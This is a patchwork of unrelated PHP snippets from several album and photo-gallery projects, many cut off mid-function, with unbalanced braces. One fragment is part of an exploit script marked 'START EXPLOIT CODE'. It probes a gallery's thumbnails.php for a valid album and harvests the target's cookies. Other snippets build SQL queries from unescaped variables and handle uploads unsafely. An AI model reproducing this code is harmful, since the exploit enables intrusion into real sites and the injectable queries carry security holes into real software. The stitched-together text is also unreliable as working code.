function printPhotoGrid()
{
$album = getAlbum();
$photoGrid = "<div id='welcome'>\n <div class='container-fluid clearfix' style='padding:0; overflow:hidden'>\n <div id='ib-main-wrapper' style='height:auto;' class='ib-main-wrapper'>\n <div class='ib-main'>";
//$photoGrid .= buildTextBox($album);
$photoGrid .= getAlbumPhotos($album);
$photoGrid .= "<div class='clr'></div></div></div></div></div>";
return $photoGrid;
}
function moveAlbumDOWN($album_id)
{
if (albumExists($album_id)) {
// Current Album
$album = getAlbum($album_id);
$order_id = $album['OrderID'];
// Nearest Album
$q0 = mysql_query("SELECT * FROM `mbg_albums` WHERE `OrderID` > {$order_id} AND `AlbumID` <> {$album_id} ORDER BY `OrderID` ASC LIMIT 0,1");
if (mysql_num_rows($q0)) {
$r0 = mysql_fetch_array($q0);
$r0_album_id = $r0['AlbumID'];
$r0_order_id = $r0['OrderID'];
mysql_query("UPDATE `mbg_albums` SET `OrderID` = {$r0_order_id} WHERE `AlbumID` = {$album_id}");
mysql_query("UPDATE `mbg_albums` SET `OrderID` = {$order_id} WHERE `AlbumID` = {$r0_album_id}");
}
}
}
}
});
Flight::route('GET /track/@id/edit', function ($id) {
$request = Flight::request();
$track = json_decode(getTrack($id));
if (!isset($track->error)) {
Flight::render('editTRack', array('track' => $track), 'body_content');
Flight::render('layout', array('Titre' => 'Modifier le track ' . $track[0]->title));
} else {
Flight::redirect($request->referrer);
}
});
Flight::route('GET|POST /album/@id/edit', function ($id) {
$request = Flight::request();
if ($request->method == "GET") {
$album = json_decode(getAlbum($id));
if (!isset($album->error)) {
Flight::render('editAlbum', array('album' => $album), 'body_content');
Flight::render('layout', array('Titre' => 'Modifier un track à ' . $album[0]->title));
} else {
Flight::redirect($request->referrer);
}
} else {
if ($request->method == "POST") {
$album = json_encode($_POST);
$result = json_decode(editAlbum($album));
if (isset($result->ID)) {
Flight::redirect($request->referrer);
} else {
Flight::redirect('http://localhost/php/App/playlists');
}
<?require_once('session_check.php');
if(!isset($_GET["id"])){
http_response_code(400);
exit();
}
require_once("album.php");
$owners = getAlbumAllowedEditors($_GET["id"]);
if(!isset($_SESSION["id"]) || !in_array($_SESSION["id"], $owners, TRUE)){
http_response_code(403);
exit();
}
if(!existsAlbum($_GET["id"])){
http_response_code(404);
exit();
}
$album = getAlbum($_GET["id"]);
$deleted = deleteAlbum($_GET["id"]);
var_dump($deleted);
if(!$deleted){
http_response_code(500);
exit;
}
http_response_code(200);
header("Location: ../event.php?id=".$album["eid"]);
?>
<?
require_once('session_check.php');
require_once("album.php");
if(existsAlbum($_POST["albumId"])){
addAlbumPhoto($_POST["albumId"],$_FILES["albumImage"]);
$eventID = getAlbum($_POST["albumId"])["eid"];
http_response_code(200);
if(1){//!isset($_POST["return_json"]) && $_POST["return_json"]){
echo json_encode(getAlbumImages(getAlbum($_POST["albumId"])));
}
else
header("Location: ../manageAlbums.php?eid=".$eventID);
}
else{
http_response_code(400);
header("Location: ../index.php");
}
mysql_query("UPDATE `mbg_albums` SET `Thumbnail3Size` = '{$size3['0']}x{$size3['1']}' WHERE `AlbumID` = '{$last_id}'");
}
}
}
}
// Start Uploading Files
if ($upload_image = $_FILES['upload_image']) {
$album_id = $_GET['album_id'];
$allowed_file_types = array("jpg", "png", "jpeg", "gif");
$file_name = $upload_image['name'];
$file_type = strtolower(end(explode(".", $file_name)));
$file_tmp = $upload_image['tmp_name'];
$path_to_upload_files = $images_path;
if (in_array($file_type, $allowed_file_types)) {
if (albumExists($album_id)) {
$album = getAlbum($album_id);
// Generate Name
switch (strtolower($naming)) {
case "hash":
case "random":
$new_name = substr(time(), 5) . '_' . substr(md5(time() + rand(1000, 9999)), 0, 6) . '_' . substr(sha1(time() + rand(1000, 9999)), 0, 6) . '.' . $file_type;
break;
case "normal":
$new_name = $file_name;
break;
default:
$new_name = str_replace(array(',', "'", '"'), '-', strtolower($file_name));
}
$album_path = $path_to_upload_files . 'album_' . $album_id . '/';
$upload_file_path = $album_path . $new_name;
if (!file_exists($album_path)) {
<?php
$id = $_GET['id'];
if (albumExists($id)) {
$album = getAlbum($id);
$images = getAlbumImages($id);
?>
<script type="text/javascript" src="js/album_manage.js"></script>
<a href="?action=album&id=<?php
echo $id;
?>
&edit" class="button" title="Click to edit">Album: <strong><?php
echo $album['AlbumName'];
?>
</strong></a>
<div class="separator"></div>
<h1>Manage Album</h1>
<?php
if (isset($_GET['edit'])) {
include "edit_album.php";
}
?>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<input type="hidden" name="album_id" id="album_id" value="<?php
echo $album['AlbumID'];
?>
">
<input type="file" name="upload_image" id="upload_image" class="button">
</form>
<?php
/**
* REST wrapper to the SOAP's getAlbum function. This returns the discography
* for a single album. Please note that the entry-point can parse 'album' into
* albumName and albumYear if 'album' is provided in the normal LyricWiki page
* title format (such as "Pink Floyd" for 'artist' and "Dark Side Of The Moon (1973)" for
* 'album').
*/
function rest_getAlbum($artist, $albumName, $albumYear, $fmt)
{
wfProfileIn(__METHOD__);
if (empty($fmt)) {
$fmt = 'html';
}
$result = getAlbum($artist, $albumName, $albumYear);
switch ($fmt) {
case 'php':
print serialize($result);
break;
case 'text':
$this->dumpText($result);
break;
case 'json':
case 'realjson':
$this->writeRealJSON($result);
break;
case 'xml':
// TODO: IMPLEMENT
// TODO: IMPLEMENT
case 'html':
default:
$albumName = getVal($result, 'album');
$year = getVal($result, 'year');
$amznLink = getVal($result, 'amazonLink');
$songs = getVal($result, 'songs');
print "<a href='{$this->root}" . $this->linkEncode("{$artist}:{$albumName}" . ($year == "" ? "" : "_({$year})")) . "'>{$albumName}" . ($year == "" ? "" : "_({$year})") . "</a>";
if ($amznLink != "") {
print " - (at <a href='{$amznLink}' title=\"{$albumName} at amazon\">amazon</a>)";
}
if (count($songs) > 0) {
print "<ul class='songs'>\n";
foreach ($songs as $currSong) {
if (strpos($currSong, ":") !== false) {
print "<li><a href='{$this->root}" . $this->linkEncode($currSong) . "'>{$currSong}</a></li>\n";
} else {
print "<li><a href='{$this->root}" . $this->linkEncode("{$artist}:{$currSong}") . "'>{$currSong}</a></li>\n";
}
}
print "</ul>\n";
}
print "</li>\n";
break;
}
wfProfileOut(__METHOD__);
}
<?
session_start();
require_once("database/album.php");
if(!isset($_GET['id'])){
http_response_code(400);
?><p> No album was specified </p><?
exit;
}
if(!existsAlbum($_GET['id'])){
http_response_code(404);
?><p> The album does not exist in the server </p><?
exit;
}
$album = getAlbum($_GET['id']);
$eventId = intval(getAlbum($_GET['id'])['eid']);
$albumImages = getAlbumImages($album);
?>
<!DOCTYPE html>
<html>
<head>
<?require_once('includes.php');?>
<script type="text/javascript" src="scripts/view_album.js"></script>
<link rel="stylesheet" type="text/css" href="stylesheets/album.css" >
</head>
<body>
<?require_once('templates/header.php');?>
<section id="album">
<h1> <?echo $album['nome'];?></h1>
$sn++;
if ($sn > 32) {
return;
}
}
}
###############################################################
## START E X P L O I T C O D E
#############################################################
echo '
Exploiting:
[+] target: ' . $argv[1] . '/' . $argv[2] . '
';
$page = '';
$firstReply = sendit($page, 'GET');
$album = getAlbum($firstReply);
### get valid album number
if ($album == 0) {
echo "[-] No valid album found...\n";
if ($argv[3] != 0) {
echo "... Forcing\n";
$album = $argv[3];
} else {
credits();
}
}
$page = 'thumbnails.php?album=' . $album;
$GLOBALS['album'] = $album;
echo "[+] Valid album number: " . $album . "\n";
$GLOBALS['cookies'] = getCookie($firstReply);
### get cookie from host
<?require_once('session_check.php');
if(!isset($_POST["aid"]) || !isset($_POST["iid"])){
http_response_code(400);
exit();
}
require_once("album.php");
$owners = getAlbumAllowedEditors($_POST["aid"]);
$album = getAlbum($_POST["aid"]);
if(!isset($_SESSION["id"]) || !in_array($_SESSION["id"], $owners, TRUE) ){
http_response_code(403);
exit();
}
if(!existsAlbum($_POST["aid"])|| !imageInAlbum($_POST["iid"], $_POST["aid"])){
http_response_code(404);
exit();
}
require("connect.php");
$stmt2 = $db->prepare("DELETE FROM ImageAlbum WHERE iid=? and aid=?");
$res2 = $stmt2->execute(array($_POST["iid"], $_POST["aid"]));
$stmt = $db->prepare('DELETE FROM Image WHERE iid=?');
$res = $stmt->execute(array($_POST["iid"]));
if(!$res || !$res2){
http_response_code(500);
var_dump($_POST["iid"]);
exit;
}
http_response_code(200);
